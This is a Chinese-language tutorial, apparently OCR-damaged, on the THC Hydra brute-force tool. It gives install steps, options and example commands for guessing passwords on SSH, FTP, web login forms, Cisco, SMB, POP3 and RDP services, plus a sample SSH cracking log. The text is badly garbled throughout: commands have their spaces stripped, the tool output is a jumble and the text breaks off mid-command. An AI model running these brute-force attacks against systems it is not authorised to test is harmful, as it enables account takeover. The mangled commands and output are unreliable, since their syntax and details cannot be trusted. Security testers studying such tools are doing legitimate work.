密码破解渗透工具-Hydra

1、密码破解渗透工具Hydra这款暴力密码破解工具相当强大，支持几乎所有协议的在线密码破解，其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说，有时能够得到事半功倍的效果。简介hydra是著名黑客组织thc的一款开源的暴力密码破解工具，可以在线破解多种密码。官网：/thc-hydra,可支持AFP,CiscoAAA,Ciscoauth,Ciscoenable,CVS,Firebird,ftp,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-head,HTTP-PROXY,HTTPS-FORM-GET,HTTPS-FORM-POST,HTTPS-G

2、ET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,mysql,NCP,NNTP,OracleListener,OracleSID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES,RDP,rexec,rlogin,rsh,SAP/R3,SIP,SMB,SMTP,SMTPEnum,SNMP,SOCKS5,型(v1andv2),Subversion,Teamspeak仃S2),telnet,VMware-Auth,VNCandXMPP等类型密码。安装如果是Debian和Ubuntu发行版，源里自带hydra,直接用apt

3、-get在线安装：sudoapt-getinstalllibssl-devlibssh-devlibidn11-devlibpcre3-devlibgtk2.0-devlibmysqlclient-devlibpq-devlibsvn-devfirebird2.1-devlibncp-devhydraRedhat/Fedora发行版的下载源码包编译安装，先安装相关依赖包：yuminstallopenssl-develpcre-develncpfs-develpostgresql-devellibssh-develsubversion-develhydra下载地址： HYPERLINK http

4、:/www.thc.Org/releases/hydra-7.3._taf.gz http:/www.thc.Org/releases/hydra-7.3._taf.gztarzxvfhydra-7.0-src.tar.gzcdhydra-7.0-src./configuremakemakeinstallhydra支持GUI图形界面，不过习惯还是命令好用。参数说明搜hydra-llogin|-Lfile-pPASS|-PFILE|-CFILE-ens-oFILE-tTASKS-MFILE-TTASKS-wtime-f-sPORT-S-vVserverserviceOPT-R继续从上一次进度接着

5、破解。-S采用SSL链接。-sPORT可通过这个参数指定非默认端口。-lLOGIN指定破解的用户，对特定用户破解。-LFILE指定用户名字典。-pPASS小写，指定密码破解，少用，一般是采用密码字典。-PFILE大写，指定密码字典。-ens可选选项，n：空密码试探，s：使用指定用户和密码试探。-CFILE使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。-MFILE指定目标列表文件一行一条。-oFILE指定结果输出文件。-f在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。-tTASKS同时运行的线程数，默认为16。-wTIME设置最大超时的时间，单位秒，默认是30s。-v

6、/-V显示详细过程。server目标ipservice指定服务名，支持的服务和协议：telnetftppop3-ntlmimap-ntlmsmbsmbnthttp-head|gethttp-get|post-formhttp-proxyciscocisco-enablevncldap2ldap3mssqlmysqloracle-listenerpostgresnntpsocks5rexecrloginpcnfssnmprshcvssvnicqsapr3sshsmtp-auth-ntlmpcanywhereteamspeaksipvmauthdfirebirdnepafp等等。实例手动创建用户名

7、字典和密码字典在这里只是为了演示，只加了几个用户名和弱口令。真正破解时，需要利用密码字典生成器生成强大的字典。破解ssh：#hydra-Lusers.txt-Ppassword.txt-t1-vV-ens04sshrootTS-DEVhydraLusers.txt-Ppassord-txt-t1-W-ens04sshHydra*7.Jul匚)2012byvanHauseryTHC&DavidMaciejak-forlga.lpurposesonlyHydra(http;tlhc.oirigflih匚一hydra)startingat2013-DI-0122;06;07aTA1task,1耳er

8、verr32logintriesCli:4/p:S),32triespertaskDATAattacklngeevicesshonpoirt22Res&lvtngaddressesdonetargettargettargetTargettarget；verbose_attejv.pt1attemptATTEMPTattemptattemptLTTEWPTattemptATTEMPTATTEMPT:ATTEMPTattempt!；ATTQVPTJTTEM卩巧attenftdTTlEWrTTEPTJTTE：PTATTENFTbatteptTT匚IMPTj；ATTEJVPTattemptATTHVP

9、t:ATTEMPTattempt!attemptATTEMPT_statusanackfinishedfor192.ls58a1.104(weiring1of1targetsu仁ue于芳fulTHydra(http:/wwtheorgraotffiTS-DEV持.1921B:L1D4192：L6E:L1041QD4041921石工1)4host:192)6E：L：L社斗targettargettargettargettargettargethost:192.IBS.1.IMtargetlargertargettargettargetTargettargettargettargettarg已tt

10、argettargettargettargettargettarget192.168/1.LDa04D404192.168.1.LD404041921五百:L104D4192.168B1.104192：LE：L.104192:：LG：L192.16E.1.LD4192:LG咅110419216名:L10404192.16B.1.104192：L6E：L.104192.168.1：LU4_loginlogin-login一login-in1n:-login_login一login一loginlogin一loiginlogin:一login-login_login一login一loginlogin

11、一login一login一login-login一login-login_login一log-inlogin-login1BrootTi-1of32cMId0IErr-2of32child0a,adm1nistrator-3of32chiId0radm1ni23-4ofB2child0.wabcl23-5of32child0passwo-rd:abclSBprdau1dF,-gof32匚h1ldQrtri-10of32child0,radmim5tratorr-11of32childQ,admirCL23u-12of22child0abcizs-13Of32Child0rr123456-14o

12、f32child0password:123456-pass，八-pass-pass一pass-pass-pass-pass-.Pass一passpass-pass一一passrootrootdauld-pzssdavid-pa51cdavid-passdavid-passdavld-pass,rdavid-passdayidEirtux，rt1nux,rfinuxnHxtinuxHnuxT,linuxT,linuxpoGtgreE_pDtgrEs-postgres_postgrws_postgres-postgres11_postgrespostgra_1-inuw-17of32Lch-iId

13、0，,r,-18OT3ZLChildOadminisTrator-19afJZchild0adm-irTL123r-2Dof32chilaOabcl231-?1of益child0，r123456r,-22Df32Child0password-23of_passwordpasapasspasspasspassEams_forchildrentoiycompleted.2validpaswordafoundI/the-hydra)finishedst2013-D1-0122:06:10child0124of32childO；posTgres-25at32chld,rG-2Cof3?Fchild0a

14、dmdndstratDr-L*admdrd.23abcl23,P-,r123456ir-password1password27of32child0-28of32child0Of32child0of32chiIdQ|31of32child0-32of32child0ciynpfetelesrs)破解成功，直接显示结果。也可以使用-o选项指定结果输出文件#hydra-Lusers.txt-Ppassword.txt-t1-vV-ens-osave.log04ssh其他类型密码破解在破解ftp：hydraipftp-l用户名-P密码字典-t线程（默认16）-vVhydraipftp-l用户名-P密码

15、字典-ens-vVget方式提交，破解web登录：hydra-l用户名-p密码字典-t线程-vV-ensiphttp-get/admin/hydra-l用户名-p密码字典-t线程-vV-ens-fiphttp-get/admin/index.phppost方式提交，破解web登录：该软件的强大之处就在于支持多种协议的破解，同样也支持对于web用户界面的登录破解，get方式提交的表单比较简单，这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是，如果目标网站登录时候需要验证码就无法破解了。带参数破解如下：vinputtype=submitname=subvalue=提交假设有以上

16、一个密码登录表单，我们执行命令：hydra-ladmin-Ppass.lst-ook.lst-t1-fhttp-post-form“index.php:name二“USER”&pwd二“PASS:invalido”说明：破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t是同时线程数为1，-f是当破解了一个密码就停止，ip是本地，就是目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解。后面参数是网页中对应的表单字段的name属性，后面vtitle中的内容是表示错误猜解的返回信息提示,可以自定义。破解https：hydra-m/index.php-lmuts-Ppass.txt8https破解teamspeak：hydra-l用户名-P密码字典-s端口号-vVipteamspeak破解cisco：hydra-Ppass.txt8ciscohydra-mcloud-Ppass.txt8cisco-enable破解smb：hydra-ladministrator-Ppass.txt8smb破解pop3：hydra-lmuts-Ppass.txtmy.pop3.mailpop3破解rdp：hydraiprdp-ladministra